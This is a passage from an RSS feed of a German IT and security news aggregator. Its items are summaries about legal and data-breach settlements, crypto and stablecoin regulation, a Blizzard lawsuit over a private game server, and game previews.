<title><![CDATA[Best Crypto Payment Solutions for E-Commerce Businesses]]></title>
<description><![CDATA[Compare crypto payment gateways for ecommerce, including checkout tools, stablecoin payments, fiat settlement, plugins, APIs and business payouts. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the original article: Best Crypto Payment…
Read more...]]></description>
<link>https://tsecurity.de/de/3620629/it-security-nachrichten/best-crypto-payment-solutions-for-e-commerce-businesses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620629/it-security-nachrichten/best-crypto-payment-solutions-for-e-commerce-businesses/</guid>
<pubDate>Wed, 24 Jun 2026 10:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Compare crypto payment gateways for ecommerce, including checkout tools, stablecoin payments, fiat settlement, plugins, APIs and business payouts. This article has been indexed from Hackread – Cybersecurity News, Data Breaches, AI and More Read the original article: Best Crypto Payment…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/best-crypto-payment-solutions-for-e-commerce-businesses/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/best-crypto-payment-solutions-for-e-commerce-businesses/">Best Crypto Payment Solutions for E-Commerce Businesses</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best Crypto Payment Solutions for E-Commerce Businesses]]></title>
<description><![CDATA[Compare crypto payment gateways for ecommerce, including checkout tools, stablecoin payments, fiat settlement, plugins, APIs and business payouts.]]></description>
<link>https://tsecurity.de/de/3620561/it-security-nachrichten/best-crypto-payment-solutions-for-e-commerce-businesses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620561/it-security-nachrichten/best-crypto-payment-solutions-for-e-commerce-businesses/</guid>
<pubDate>Wed, 24 Jun 2026 09:53:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Compare crypto payment gateways for ecommerce, including checkout tools, stablecoin payments, fiat settlement, plugins, APIs and business payouts.]]></content:encoded>
</item>
<item>
<title><![CDATA[Hawthorn Preview (PC)]]></title>
<description><![CDATA[Hawthorn is a very interesting concept for a game, because you are in a beautiful fantasy world, a sandbox filled with animals, and you get to explore it, craft stuff, complete quests and enjoy everything living around you. You’re in a woodland settlement that was meant to be a trading post for t...]]></description>
<link>https://tsecurity.de/de/3619418/it-security-nachrichten/hawthorn-preview-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619418/it-security-nachrichten/hawthorn-preview-pc/</guid>
<pubDate>Tue, 23 Jun 2026 21:23:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hawthorn is a very interesting concept for a game, because you are in a beautiful fantasy world, a sandbox filled with animals, and you get to explore it, craft stuff, complete quests and enjoy everything living around you. You’re in a woodland settlement that was meant to be a trading post for the woodland creatures, and your focus is to try and breathe life back into it. And you do that by recruiting woodland creatures, which is very exciting.

Since this is a sandbox RPG at heart, that means you will be foraging, fishing, crafting and doing all kinds of tasks similar to that. You can take the role of a woodland creature and then focus on developing the lakeside settlement in Windermere valley. One of the things I enjoyed but never expected from the game is to have seasons in the game, as well as resource cycles.

The game goes even further by allowing you to easily recruit NPCs in order to assist with tasks and automate them the way you want. It’s nice to see that...]]></content:encoded>
</item>
<item>
<title><![CDATA[Frontier Legends Preview (PC)]]></title>
<description><![CDATA[I’ve always been fascinated by the Wild West and how people were able to live and survive during those harsh times. That’s why I enjoyed games like Red Dead Redemption and its sequel but also clamored for a survival game in this genre. Wild West Legacy was not it, and Frontier Legends tries to br...]]></description>
<link>https://tsecurity.de/de/3609559/it-security-nachrichten/frontier-legends-preview-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609559/it-security-nachrichten/frontier-legends-preview-pc/</guid>
<pubDate>Fri, 19 Jun 2026 08:52:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I’ve always been fascinated by the Wild West and how people were able to live and survive during those harsh times. That’s why I enjoyed games like Red Dead Redemption and its sequel but also clamored for a survival game in this genre. Wild West Legacy was not it, and Frontier Legends tries to bring us a new take on this genre.

Frontier Legends does have its own story, but the premise is to establish your mark in this world, build your own base and stay alive in the unforgiving setting of Wild West. At first, your camp is small, but eventually, you get to upgrade it to a settlement. Of course, there are lots of threats, be it bandits or natural threats like various dangerous animals.

The great appeal behind Frontier Legends is that it allows you to be anything you want. You can focus more on trading, hunting, being a bandit or anything you want. And that’s the cool factor, the game doesn’t force you to be anything, you slowly uncover things and establish yourself a...]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s $68 Million Settlement: Who Qualifies and How to File a Claim]]></title>
<description><![CDATA[Google Assistant users and Google-made device buyers may qualify for money from a $68M settlement. Claims are due Aug. 27, 2026.
The post Google’s $68 Million Settlement: Who Qualifies and How to File a Claim appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3599823/it-nachrichten/googles-68-million-settlement-who-qualifies-and-how-to-file-a-claim/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599823/it-nachrichten/googles-68-million-settlement-who-qualifies-and-how-to-file-a-claim/</guid>
<pubDate>Mon, 15 Jun 2026 19:19:47 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google Assistant users and Google-made device buyers may qualify for money from a $68M settlement. Claims are due Aug. 27, 2026.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-google-assistant-privacy-settlement-claims/">Google’s $68 Million Settlement: Who Qualifies and How to File a Claim</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Are You Eligible to Claim Part of Apple's $250M AI iPhone Settlement? How to Find Out]]></title>
<description><![CDATA[Apple must pay iPhone owners to settle a lawsuit over delayed and missing AI features.]]></description>
<link>https://tsecurity.de/de/3597296/it-nachrichten/are-you-eligible-to-claim-part-of-apples-250m-ai-iphone-settlement-how-to-find-out/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597296/it-nachrichten/are-you-eligible-to-claim-part-of-apples-250m-ai-iphone-settlement-how-to-find-out/</guid>
<pubDate>Sun, 14 Jun 2026 17:48:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple must pay iPhone owners to settle a lawsuit over delayed and missing AI features.]]></content:encoded>
</item>
<item>
<title><![CDATA[Blizzard Sues To Take Down Another Private World of Warcraft Server, Project Ascension]]></title>
<description><![CDATA["Blizzard Entertainment is continuing its crusade against private World of Warcraft servers," reports the gaming news site Aftermath:

 The company filed a new lawsuit on Friday in a California court against the makers of Project Ascension, alleging copyright infringement, Digital Millennium Copy...]]></description>
<link>https://tsecurity.de/de/3597233/it-security-nachrichten/blizzard-sues-to-take-down-another-private-world-of-warcraft-server-project-ascension/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597233/it-security-nachrichten/blizzard-sues-to-take-down-another-private-world-of-warcraft-server-project-ascension/</guid>
<pubDate>Sun, 14 Jun 2026 16:51:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Blizzard Entertainment is continuing its crusade against private World of Warcraft servers," reports the gaming news site Aftermath:

 The company filed a new lawsuit on Friday in a California court against the makers of Project Ascension, alleging copyright infringement, Digital Millennium Copyright Act violations, and other claims. Blizzard Entertainment claims that Project Ascension is a "lucrative way to exploit and profit from the popularity of the WoW game experience," according to the complaint, obtained by Aftermath. Blizzard Entertainment's lawyers say in the complaint that Project Ascension purports to have "over a million players." Lawyers write that the developers have "distributed (and are continuing to distribute) millions of pirated copies of Blizzard's copyrighted WoW game software." 

They also allege that Project Ascension's servers are hosted on Russian "bulletproof" servers with Aeza Group, a company that was sanctioned in 2025 "for its role in supporting cybercriminal activity targeting victims in the United States and around the world," per a U.S. Department of Treasury press release... Project Ascension lets players combine pieces of World of Warcraft's different classes to build unique characters. It's free-to-play, but players can purchase in-game currency, Donation Points, to buy things in-game, such as cosmetics and experience boosts. Blizzard Entertainment's lawyers assert that Project Ascension has made "millions of dollars from the sale of Donation Points...." 

Blizzard Entertainment successfully sued a popular World of Warcraft server called Turtle Wow last year. The project had been running since 2018, taking donations from players for the free-to-play server. Both sides announced in April 2026 that they'd reached a settlement after Blizzard Entertainment was awarded a permanent injunction to shut down Turtle WoW. The details of the settlement were not made public. Turtle WoW was shut down for good shortly after May 15; players gathered online to mourn the end of the server.
<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Blizzard+Sues+To+Take+Down+Another+Private+World+of+Warcraft+Server%2C+Project+Ascension+%3A+https%3A%2F%2Fgames.slashdot.org%2Fstory%2F26%2F06%2F14%2F0743231%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fgames.slashdot.org%2Fstory%2F26%2F06%2F14%2F0743231%2Fblizzard-sues-to-take-down-another-private-world-of-warcraft-server-project-ascension%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://games.slashdot.org/story/26/06/14/0743231/blizzard-sues-to-take-down-another-private-world-of-warcraft-server-project-ascension?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Was Scammed Buying GLP-1s Online. I’m Not Alone]]></title>
<description><![CDATA[Customers have complained that a telehealth network selling compounded GLP-1s has been ripping them off—even after it had to pay $5 million to clients as part of a settlement with the US government.]]></description>
<link>https://tsecurity.de/de/3589971/it-nachrichten/i-was-scammed-buying-glp-1s-online-im-not-alone/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589971/it-nachrichten/i-was-scammed-buying-glp-1s-online-im-not-alone/</guid>
<pubDate>Thu, 11 Jun 2026 11:18:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Customers have complained that a telehealth network selling compounded GLP-1s has been ripping them off—even after it had to pay $5 million to clients as part of a settlement with the US government.]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple’s WWDC AI demos looked more real after $250M false ad settlement]]></title>
<description><![CDATA[The vibe of Apple's 2026 WWDC keynote felt like a spouse proudly listing all the honey-do-list items tackled. One subtle example: the many AI demos of someone standing, phone in hand.]]></description>
<link>https://tsecurity.de/de/3583107/it-nachrichten/apples-wwdc-ai-demos-looked-more-real-after-250m-false-ad-settlement/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3583107/it-nachrichten/apples-wwdc-ai-demos-looked-more-real-after-250m-false-ad-settlement/</guid>
<pubDate>Tue, 09 Jun 2026 00:47:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The vibe of Apple's 2026 WWDC keynote felt like a spouse proudly listing all the honey-do-list items tackled. One subtle example: the many AI demos of someone standing, phone in hand.]]></content:encoded>
</item>
<item>
<title><![CDATA[Criticisms Rise Before Vote on America's Cryptocurrency 'Clarity Act']]></title>
<description><![CDATA[An upcoming vote in a few weeks on America's cryptocurrency "Clarity Act" is "rattling Wall Street and consumer advocates," reports CNN, with its proposal to regulate the bulk of crypto markets through America's Commodity Futures Trading Commission. "It allows crypto companies to operate, at long...]]></description>
<link>https://tsecurity.de/de/3577989/it-security-nachrichten/criticisms-rise-before-vote-on-americas-cryptocurrency-clarity-act/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577989/it-security-nachrichten/criticisms-rise-before-vote-on-americas-cryptocurrency-clarity-act/</guid>
<pubDate>Sat, 06 Jun 2026 17:52:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An upcoming vote in a few weeks on America's cryptocurrency "Clarity Act" is "rattling Wall Street and consumer advocates," reports CNN, with its proposal to regulate the bulk of crypto markets through America's Commodity Futures Trading Commission. "It allows crypto companies to operate, at long last, in compliance with U.S. rules, rather than what they have been doing — essentially running their businesses within a patchwork of state and federal legal gray areas."


Even for Jamie Dimon, the banking titan who's not known to mince words, it was a surprising shot across the bow when he described a fellow financier as "full of sh*t." "No one's gonna bow down to this guy or that company," Dimon told Fox Business last week. "This guy" being Brian Armstrong, and "that company" being cryptocurrency exchange Coinbase. The Dimon-Armstrong tension isn't new, but it is boiling over publicly as the Senate inches closer to a floor vote on the crypto industry's No. 1 legislative priority, known as the Clarity Act. Dimon, a longtime crypto skeptic, broadly supports crypto regulation but takes issue with a provision in the Clarity Act that would allow companies like Coinbase to "effectively pay interest on deposits... without the protection they should have." 
The spicy comment about Armstrong came after Dimon rattled off other concerns about the Clarity Act, including what he sees as its insufficient anti-money-laundering and know-your-customer safeguards that banks have had in place for decades... "If (Armstrong) takes deposits like a bank, he should have bank rules," Dimon said in the Fox Business interview... The immediate concern from banks (and many consumer advocates) is that crypto exchanges like Coinbase would, in the grand tradition of Silicon Valley innovation, lure customers in with huge rewards and then phase those benefits out over time. Deposits in a crypto exchange are also not insured by the federal government the way bank deposits are, but that's the kind of fine print that customers tend to overlook until it's too late. JPMorgan Chase spokesperson Trish Wexler underscored that the bank wants the bill to pass, with some "fixes," like prohibiting rewards on stablecoin holdings and strengthening anti-money-laundering guardrails. 

Coinbase's CEO responded in an interview with Politico:


Armstrong pointed to restrictions on rewards paid to idle cryptocurrency balances and disclosures on stablecoins as part of a handful of policies included in the bill to appease the banking industry's requests. "I think it'd be good for the banks," Armstrong said of the bill. "It would be great for crypto companies as well ... Hopefully we can get past the absolutisms and just see if we can get this bill over the finish line." 

But CNN notes concerns about weaving cryptocurrency — "a historically self-contained financial system prone to stomach-churning booms and busts" — more deeply into America's traditional finance infrastructure:

"It's not just a crypto story, it's a broad deregulation of our securities markets story," Hilary Allen, a law professor at American University who specializes in banking and cryptocurrency, said in an interview. And that should concern everyone, Allen says, even if they have no investments at all, because "if we get a financial crisis in this space... no one comes out of that unscathed."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Criticisms+Rise+Before+Vote+on+America's+Cryptocurrency+'Clarity+Act'%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F06%2F0156205%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F06%2F0156205%2Fcriticisms-rise-before-vote-on-americas-cryptocurrency-clarity-act%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/06/06/0156205/criticisms-rise-before-vote-on-americas-cryptocurrency-clarity-act?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Banks Want Blockchain Without Crypto]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:3 Large banks are exploring “tokenized deposits” as a way to modernize banking infrastructure without converting customer funds into cryptocurrency. Instead of placing money directly on-chain, the blockchain can act as a record laye...]]></description>
<link>https://tsecurity.de/de/3577847/it-security-video/banks-want-blockchain-without-crypto/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3577847/it-security-video/banks-want-blockchain-without-crypto/</guid>
<pubDate>Sat, 06 Jun 2026 16:17:46 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/6IQvmeGSbDU?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Large banks are exploring “tokenized deposits” as a way to modernize banking infrastructure without converting customer funds into cryptocurrency. Instead of placing money directly on-chain, the blockchain can act as a record layer that references deposits still held inside the conventional banking system.<br />
<br />
This approach could let banks benefit from blockchain-based settlement and transfer systems while avoiding the disintermediation associated with decentralized crypto networks. In practice, it preserves existing banking structures while adopting newer transaction rails underneath.<br />
<br />
If banks use blockchain technology but keep deposits fully inside the traditional financial system, is that genuine financial innovation — or simply legacy banking with upgraded infrastructure?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#Blockchain #Banking #FinTech #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[NYDFS, European Banking Authority Join Forces to Oversee, Monitor Stablecoin Activities]]></title>
<description><![CDATA[The New York State Department of Financial Services and the European Banking Authority have signed an MoU to coordinate supervision of cross-border stablecoin activities. The agreement aims to share information, monitor risks, and conduct market surveillance under MiCA.]]></description>
<link>https://tsecurity.de/de/3569497/it-nachrichten/nydfs-european-banking-authority-join-forces-to-oversee-monitor-stablecoin-activities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3569497/it-nachrichten/nydfs-european-banking-authority-join-forces-to-oversee-monitor-stablecoin-activities/</guid>
<pubDate>Wed, 03 Jun 2026 14:17:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The New York State Department of Financial Services and the European Banking Authority have signed an MoU to coordinate supervision of cross-border stablecoin activities. The agreement aims to share information, monitor risks, and conduct market surveillance under MiCA.]]></content:encoded>
</item>
<item>
<title><![CDATA[Musk, SEC Defend Settlement Over Twitter Share Buy]]></title>
<description><![CDATA[Elon Musk, regulator argue $1.5m settlement is free from collusion or corruption, after federal judge’s challenge This article has been indexed from Silicon UK Read the original article: Musk, SEC Defend Settlement Over Twitter Share Buy
Read more →
The post Musk, SEC Defend Settlement Over Twitt...]]></description>
<link>https://tsecurity.de/de/3568840/it-security-nachrichten/musk-sec-defend-settlement-over-twitter-share-buy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3568840/it-security-nachrichten/musk-sec-defend-settlement-over-twitter-share-buy/</guid>
<pubDate>Wed, 03 Jun 2026 10:39:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Elon Musk, regulator argue $1.5m settlement is free from collusion or corruption, after federal judge’s challenge This article has been indexed from Silicon UK Read the original article: Musk, SEC Defend Settlement Over Twitter Share Buy</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/musk-sec-defend-settlement-over-twitter-share-buy/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/musk-sec-defend-settlement-over-twitter-share-buy/">Musk, SEC Defend Settlement Over Twitter Share Buy</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[What Congress Should Do About the President’s Sweetheart Deal in Trump v. U.S.]]></title>
<description><![CDATA[Tax law experts offer three core actions that Congress must take to fully unwind the Trump administration’s settlement and hold its architects accountable.  
The post What Congress Should Do About the President’s Sweetheart Deal in Trump v. U.S. appeared first on Just Security.]]></description>
<link>https://tsecurity.de/de/3567844/it-security-nachrichten/what-congress-should-do-about-the-presidents-sweetheart-deal-in-trump-v-us/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3567844/it-security-nachrichten/what-congress-should-do-about-the-presidents-sweetheart-deal-in-trump-v-us/</guid>
<pubDate>Wed, 03 Jun 2026 01:22:25 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Tax law experts offer three core actions that Congress must take to fully unwind the Trump administration’s settlement and hold its architects accountable.  </p>
<p>The post <a href="https://www.justsecurity.org/140939/congress-block-deal-trump-irs/">What Congress Should Do About the President’s Sweetheart Deal in &lt;i&gt;Trump v. U.S.&lt;/i&gt;</a> appeared first on <a href="https://www.justsecurity.org/">Just Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Meta, other social networks will pay $27 million to settle Kentucky school district lawsuit]]></title>
<description><![CDATA[The Kentucky school district that filed a social media addiction lawsuit against Meta and other companies is getting $27 million in settlement.]]></description>
<link>https://tsecurity.de/de/3558956/it-nachrichten/meta-other-social-networks-will-pay-27-million-to-settle-kentucky-school-district-lawsuit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558956/it-nachrichten/meta-other-social-networks-will-pay-27-million-to-settle-kentucky-school-district-lawsuit/</guid>
<pubDate>Sat, 30 May 2026 13:47:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Kentucky school district that filed a social media addiction lawsuit against Meta and other companies is getting $27 million in settlement.]]></content:encoded>
</item>
<item>
<title><![CDATA[ClearBank koppelt Euro-Stablecoin an SEPA Instant für grenzüberschreitende Echtzeitzahlung]]></title>
<description><![CDATA[Innobis Information Security Management System ist jetzt nach ISO/IEC 27001:2022 zertifiziert ... © 2026 IT Finanzmagazin - Das Fachmagazin für IT ...]]></description>
<link>https://tsecurity.de/de/3557627/it-security-nachrichten/clearbank-koppelt-euro-stablecoin-an-sepa-instant-fuer-grenzueberschreitende-echtzeitzahlung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557627/it-security-nachrichten/clearbank-koppelt-euro-stablecoin-an-sepa-instant-fuer-grenzueberschreitende-echtzeitzahlung/</guid>
<pubDate>Sat, 30 May 2026 01:11:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Innobis Information <b>Security</b> Management System ist jetzt nach ISO/IEC 27001:2022 zertifiziert ... © 2026 <b>IT</b> Finanzmagazin - Das Fachmagazin für <b>IT</b> ...]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Daily Summary 2026-05-28]]></title>
<description><![CDATA[167 posts were published in the last hour 20:36 : Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500 20:36 : Carnival Data Breach Exposes Personal Data of Nearly 6 Million Customers 20:36 : Disgruntled 0-day hunter…
Read more →
The post IT Security News Daily Summar...]]></description>
<link>https://tsecurity.de/de/3555640/it-security-nachrichten/it-security-news-daily-summary-2026-05-28/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555640/it-security-nachrichten/it-security-news-daily-summary-2026-05-28/</guid>
<pubDate>Fri, 29 May 2026 00:07:13 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>167 posts were published in the last hour 20:36 : Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500 20:36 : Carnival Data Breach Exposes Personal Data of Nearly 6 Million Customers 20:36 : Disgruntled 0-day hunter…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-05-28/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-daily-summary-2026-05-28/">IT Security News Daily Summary 2026-05-28</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500]]></title>
<description><![CDATA[Krispy Kreme data breach settlement claims are due June 22. See who qualifies, payment options, key deadlines, and what eligible people need to file. The post Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500 appeared first…
Read more →
The post Krispy Kreme Settle...]]></description>
<link>https://tsecurity.de/de/3555513/it-security-nachrichten/krispy-kreme-settlement-deadline-nears-eligible-members-could-claim-up-to-3500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555513/it-security-nachrichten/krispy-kreme-settlement-deadline-nears-eligible-members-could-claim-up-to-3500/</guid>
<pubDate>Thu, 28 May 2026 22:37:31 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Krispy Kreme data breach settlement claims are due June 22. See who qualifies, payment options, key deadlines, and what eligible people need to file. The post Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500 appeared first…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/krispy-kreme-settlement-deadline-nears-eligible-members-could-claim-up-to-3500/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/krispy-kreme-settlement-deadline-nears-eligible-members-could-claim-up-to-3500/">Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500]]></title>
<description><![CDATA[Krispy Kreme data breach settlement claims are due June 22. See who qualifies, payment options, key deadlines, and what eligible people need to file.
The post Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500 appeared first on TechRepublic.]]></description>
<link>https://tsecurity.de/de/3555507/it-nachrichten/krispy-kreme-settlement-deadline-nears-eligible-members-could-claim-up-to-3500/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555507/it-nachrichten/krispy-kreme-settlement-deadline-nears-eligible-members-could-claim-up-to-3500/</guid>
<pubDate>Thu, 28 May 2026 22:32:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Krispy Kreme data breach settlement claims are due June 22. See who qualifies, payment options, key deadlines, and what eligible people need to file.</p>
<p>The post <a href="https://www.techrepublic.com/article/news-krispy-kreme-data-breach-settlement-claims-deadline/">Krispy Kreme Settlement Deadline Nears: Eligible Members Could Claim Up to $3,500</a> appeared first on <a href="https://www.techrepublic.com/">TechRepublic</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Email to Case Study: What We Learned About Connecting Refugee Communities in Just One Year ]]></title>
<description><![CDATA[In Uganda's Rhino Camp Refugee Settlement, we worked with local partners to train refugees and members of the surrounding community to not just use the Internet, but to build and manage their own network. 
The post From Email to Case Study: What We Learned About Connecting Refugee Communities in ...]]></description>
<link>https://tsecurity.de/de/3555503/it-nachrichten/from-email-to-case-study-what-we-learned-about-connecting-refugee-communities-in-just-one-year/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555503/it-nachrichten/from-email-to-case-study-what-we-learned-about-connecting-refugee-communities-in-just-one-year/</guid>
<pubDate>Thu, 28 May 2026 22:32:08 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="250" height="115" src="https://www.internetsociety.org/wp-content/uploads/2026/05/Rhino-Camp-250x115.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="People stand outdoors celebrating the completion of the Internet hub in the Siripi zone, waving at the camera." decoding="async" srcset="https://www.internetsociety.org/wp-content/uploads/2026/05/Rhino-Camp-250x115.jpg 250w, https://www.internetsociety.org/wp-content/uploads/2026/05/Rhino-Camp-450x206.jpg 450w, https://www.internetsociety.org/wp-content/uploads/2026/05/Rhino-Camp-1024x469.jpg 1024w, https://www.internetsociety.org/wp-content/uploads/2026/05/Rhino-Camp-768x352.jpg 768w, https://www.internetsociety.org/wp-content/uploads/2026/05/Rhino-Camp.jpg 1200w" sizes="(max-width: 250px) 100vw, 250px"></p>
<p>In Uganda's Rhino Camp Refugee Settlement, we worked with local partners to train refugees and members of the surrounding community to not just use the Internet, but to build and manage their own network. </p>
<p>The post <a href="https://www.internetsociety.org/blog/2026/05/from-email-to-case-study-what-we-learned-about-connecting-refugee-communities-in-just-one-year/">From Email to Case Study: What We Learned About Connecting Refugee Communities in Just One Year </a> appeared first on <a href="https://www.internetsociety.org/">Internet Society</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s $135M Android Privacy Settlement: Who May Be Eligible]]></title>
<description><![CDATA[Google’s $135 million Android settlement could pay eligible US users who used Android devices with cellular data since November 2017. The post Google’s $135M Android Privacy Settlement: Who May Be Eligible appeared first on TechRepublic. This article has been indexed…
Read more →
The post Google’...]]></description>
<link>https://tsecurity.de/de/3554813/it-security-nachrichten/googles-135m-android-privacy-settlement-who-may-be-eligible/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554813/it-security-nachrichten/googles-135m-android-privacy-settlement-who-may-be-eligible/</guid>
<pubDate>Thu, 28 May 2026 18:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google’s $135 million Android settlement could pay eligible US users who used Android devices with cellular data since November 2017. The post Google’s $135M Android Privacy Settlement: Who May Be Eligible appeared first on TechRepublic. This article has been indexed…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/googles-135m-android-privacy-settlement-who-may-be-eligible/">Read more →</a></p>
